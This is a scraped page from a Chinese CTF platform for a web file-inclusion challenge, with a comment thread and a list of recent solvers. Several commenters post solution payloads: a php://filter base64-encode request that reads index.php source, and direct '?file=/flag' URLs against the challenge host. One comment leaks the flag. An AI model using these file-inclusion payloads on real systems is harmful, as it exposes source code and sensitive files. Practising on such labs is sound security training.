文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 10125
提  示:
描  述:
flag{}
评论
Tolayxu 3天前

跟南邮ctf一摸一样

回复 0

17344057285 29天前

flag{b8aba5bfc55997b3368ac7b88fe3854f}

回复 0

YUMEKO 2月前

http://xxxxxxxxxxxxx/index.php?file=///flag

回复 1

15614005380 2月前

php伪协议的简单利用

回复 0

zh2i 5月前

回复 0
YUMEKO 2月前

过分了,谁都知道是伪协议

回复 0

EtHat 5月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

bkyhack123 6月前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

bkyhack123 6月前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

fonddream 7月前

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg

回复 1

大哥大 7月前

http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.

回复 2

WriteUp

image
harry

2 金币

评分(10)

解题动态

shura 攻破了该题 22小时前
xiaohaibao123 攻破了该题 22小时前
to5ny 攻破了该题 23小时前
星辰零下 攻破了该题 1天前
caicaiwoshishui 攻破了该题 1天前
1435637373 攻破了该题 1天前
匹夫aaa 攻破了该题 1天前
kanye 攻破了该题 1天前
ls552162972 攻破了该题 1天前
FUCK123 攻破了该题 1天前
sslctfone 攻破了该题 2天前
15552272296 攻破了该题 2天前
15835339396 攻破了该题 2天前
player33 攻破了该题 2天前
sp521521 攻破了该题 2天前
llo54137 攻破了该题 2天前
Graito 攻破了该题 2天前
jingquesec 攻破了该题 2天前
cherish153 攻破了该题 2天前
zhang1985 攻破了该题 3天前